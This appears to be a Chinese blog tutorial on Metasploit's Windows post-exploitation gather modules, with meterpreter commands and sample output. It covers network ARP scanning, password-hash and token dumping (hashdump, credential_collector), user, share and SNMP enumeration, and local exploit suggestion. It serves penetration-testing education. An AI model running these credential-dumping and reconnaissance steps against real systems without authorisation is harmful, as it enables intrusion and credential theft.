Metasploit Windows Post后期开发:收集模块

Metasploit提供了许多后期开发模块,可以在目标网络上收集更多信息。

 

arp_scanner

该“arp_scanner”后模块将执行ARP扫描给定的范围内通过受损主机。

meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

[*] Running module against V-MAC-XP
[*] ARP Scanning 192.168.1.0/24
[*] 	IP: 192.168.1.1 MAC b2:a8:1d:e0:68:89
[*] 	IP: 192.168.1.2 MAC 0:f:b5:fc:bd:22
[*] 	IP: 192.168.1.11 MAC 0:21:85:fc:96:32
[*] 	IP: 192.168.1.13 MAC 78:ca:39:fe:b:4c
[*] 	IP: 192.168.1.100 MAC 58:b0:35:6a:4e:cc
[*] 	IP: 192.168.1.101 MAC 0:1f:d0:2e:b5:3f
[*] 	IP: 192.168.1.102 MAC 58:55:ca:14:1e:61
[*] 	IP: 192.168.1.105 MAC 0:1:6c:6f:dd:d1
[*] 	IP: 192.168.1.106 MAC c:60:76:57:49:3f
[*] 	IP: 192.168.1.195 MAC 0:c:29:c9:38:4c
[*] 	IP: 192.168.1.194 MAC 12:33:a0:2:86:9b
[*] 	IP: 192.168.1.191 MAC c8:bc:c8:85:9d:b2
[*] 	IP: 192.168.1.193 MAC d8:30:62:8c:9:ab
[*] 	IP: 192.168.1.201 MAC 8a:e9:17:42:35:b0
[*] 	IP: 192.168.1.203 MAC 3e:ff:3c:4c:89:67
[*] 	IP: 192.168.1.207 MAC c6:b3:a1:bc:8a:ec
[*] 	IP: 192.168.1.199 MAC 1c:c1:de:41:73:94
[*] 	IP: 192.168.1.209 MAC 1e:75:bd:82:9b:11
[*] 	IP: 192.168.1.220 MAC 76:c4:72:53:c1:ce
[*] 	IP: 192.168.1.221 MAC 0:c:29:d7:55:f
[*] 	IP: 192.168.1.250 MAC 1a:dc:fa:ab:8b:b
meterpreter >

 

checkvm

该“checkvm”模块,只需足够的检查是否遭到入侵的主机是虚拟机。该模块支持Hyper-V,VMWare,VirtualBox,Xen和QEMU虚拟机。

meterpreter > run post/windows/gather/checkvm 

[*] Checking if V-MAC-XP is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >

 

credential_collector

该“credential_collector”模块收成密码哈希和令牌被感染的主机上。

meterpreter > run post/windows/gather/credentials/credential_collector 

[*] Running module against V-MAC-XP
[+] Collecting hashes...
    Extracted: Administrator:7bf4f254f224bb24aad3b435b51404ee:2892d23cdf84d7a70e2eb2b9f05c425e
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714
    Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287
[+] Collecting tokens...
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    NT AUTHORITY\ANONYMOUS LOGON
meterpreter >

 

dumplinks

该“dumplinks”模块解析在用户最近使用的文档可能是进一步的信息收集有用的.lnk文件。请注意,如下所示,我们首先需要在运行模块之前迁移到用户进程。

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1096)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1824
[*] New server process: Explorer.EXE (1824)
meterpreter > run post/windows/gather/dumplinks 

[*] Running module against V-MAC-XP
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\developers_guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\documentation.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Local Disk (C).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Netlog.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes (2).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Release.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\testmachine_crashie.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user manual.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user's guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\{33D9A762-90C8-11d0-BD43-00A0C911CE86}_load.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
meterpreter >

 

enum_applications

该“enum_applications”模块列举了安装在受损主机上的应用程序。

meterpreter > run post/windows/gather/enum_applications 

[*] Enumerating applications installed on WIN7-X86

Installed Applications
======================

 Name                                                              Version
 ----                                                              -------
 Adobe Flash Player 25 ActiveX                                     25.0.0.148
 Google Chrome                                                     58.0.3029.81
 Google Update Helper                                              1.3.33.5
 Google Update Helper                                              1.3.25.11
 Microsoft .NET Framework 4.6.1                                    4.6.01055
 Microsoft .NET Framework 4.6.1                                    4.6.01055
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148    9.0.30729.4148
 MySQL Connector Net 6.5.4                                         6.5.4
 Security Update for Microsoft .NET Framework 4.6.1 (KB3122661)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3127233)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3136000v2)  2
 Security Update for Microsoft .NET Framework 4.6.1 (KB3142037)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3143693)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3164025)    1
 Update for Microsoft .NET Framework 4.6.1 (KB3210136)             1
 Update for Microsoft .NET Framework 4.6.1 (KB4014553)             1
 VMware Tools                                                      10.1.6.5214329
 XAMPP 1.8.1-0                                                     1.8.1-0


[*] Results stored in: /root/.msf4/loot/20170501172851_pwk_192.168.0.6_host.application_876159.txt
meterpreter >

 

enum_logged_on_users

该“enum_logged_on_users”后模块与他们的SID一起返回当前和最近登录的用户列表。

meterpreter > run post/windows/gather/enum_logged_on_users 

[*] Running against session 1

Current Logged Users
====================

 SID                                            User
 ---                                            ----
 S-1-5-21-628913648-3499400826-3774924290-1000  WIN7-X86\victim
 S-1-5-21-628913648-3499400826-3774924290-1004  WIN7-X86\hacker


[*] Results saved in: /root/.msf4/loot/20170501172925_pwk_192.168.0.6_host.users.activ_736219.txt

Recently Logged Users
=====================

 SID                                            Profile Path
 ---                                            ------------
 S-1-5-18                                       %systemroot%\system32\config\systemprofile
 S-1-5-19                                       C:\Windows\ServiceProfiles\LocalService
 S-1-5-20                                       C:\Windows\ServiceProfiles\NetworkService
 S-1-5-21-628913648-3499400826-3774924290-1000  C:\Users\victim
 S-1-5-21-628913648-3499400826-3774924290-1004  C:\Users\hacker


meterpreter >

 

enum_shares

该“enum_shares”发布模块返回受损系统上已配置和最近使用的共享列表。

meterpreter > run post/windows/gather/enum_shares 

[*] Running against session 3
[*] The following shares were found:
[*] 	Name: Desktop
[*] 	Path: C:\Documents and Settings\Administrator\Desktop
[*] 	Type: 0
[*] 
[*] Recent Mounts found:
[*] 	\\192.168.1.250\software
[*] 	\\192.168.1.250\Data
[*] 
meterpreter >

 

enum_snmp

该“enum_snmp”模块将枚举SNMP服务配置的目标,如果存在的话,包括社区字符串。

meterpreter > run post/windows/gather/enum_snmp

[*] Running module against V-MAC-XP
[*] Checking if SNMP is Installed
[*] 	SNMP is installed!
[*] Enumerating community strings
[*] 
[*] 	Comunity Strings
[*] 	================
[*] 	
[*] 	 Name    Type
[*] 	 ----    ----
[*] 	 public  READ ONLY
[*] 
[*] Enumerating Permitted Managers for Community Strings
[*] 	Community Strings can be accessed from any host
[*] Enumerating Trap Configuration
[*] No Traps are configured
meterpreter >

 

hashdump

该“hashdump”发布模块将使用注册表转储受感染主机上的本地用户帐户。

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...


Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::


meterpreter >

 

usb_history

该“usb_history”模块枚举感染的系统上的USB驱动器的历史。

meterpreter > run post/windows/gather/usb_history 

[*] Running module against V-MAC-XP
[*] 
   C:	                                                             Disk ea4cea4c 
   E:	STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   A:	FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   D:	IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

[*] Kingston DataTraveler 2.0 USB Device
=====================================================================================
   Disk lpftLastWriteTime	                    Thu Apr 21 13:09:42 -0600 2011
 Volume lpftLastWriteTime	                    Thu Apr 21 13:09:43 -0600 2011
             Manufacturer	                            (Standard disk drives)
           ParentIdPrefix	                                      8&3a01dffe&0 (   E:)
                    Class	                                         DiskDrive
                   Driver	       {4D36E967-E325-11CE-BFC1-08002BE10318}\0001

meterpreter >

 

local_exploit_suggester

该“local_exploit_suggester”,或Lester ,扫描包含在Metasploit的本地漏洞的系统。然后,根据结果提出建议,并显示漏洞的位置以便更快访问。

msf > use post/multi/recon/local_exploit_suggester 
msf post(local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          2                yes       The session to run this module on.
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf post(local_exploit_suggester) > run

[*] 192.168.101.129 - Collecting local exploits for x86/windows...
[*] 192.168.101.129 - 31 exploit checks are being tried...
[+] 192.168.101.129 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[*] Post module execution completed

post/multi/recon/local_exploit_suggester

    A+
发布日期:2018年06月12日 20:56:08  所属分类:Metasploit
最后更新时间:2018-06-12 20:56:08
评分: (当前没有评级)
付杰
免费SSL证书服务 HTTPS申请 安装 配置 支持通配符*
免费SSL证书服务 HTTPS申请 安装 配置 支持通配符*
  • ¥ 199.9元
  • 市场价:20000元
花牛苹果 甘肃天水 李宏恩家自种 1斤 包邮
花牛苹果 甘肃天水 李宏恩家自种 1斤 包邮
  • ¥ 6.8元
  • 市场价:8.8元
服务器管理面板/主机控制面板“安装”服务
服务器管理面板/主机控制面板“安装”服务
  • ¥ 9.9元
  • 市场价:49.9元
SEO顾问服务 中小型网站 单站/最低99.9元 全方位优化
SEO顾问服务 中小型网站 单站/最低99.9元 全方位优化
  • ¥ 99.9元
  • 市场价:5000元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: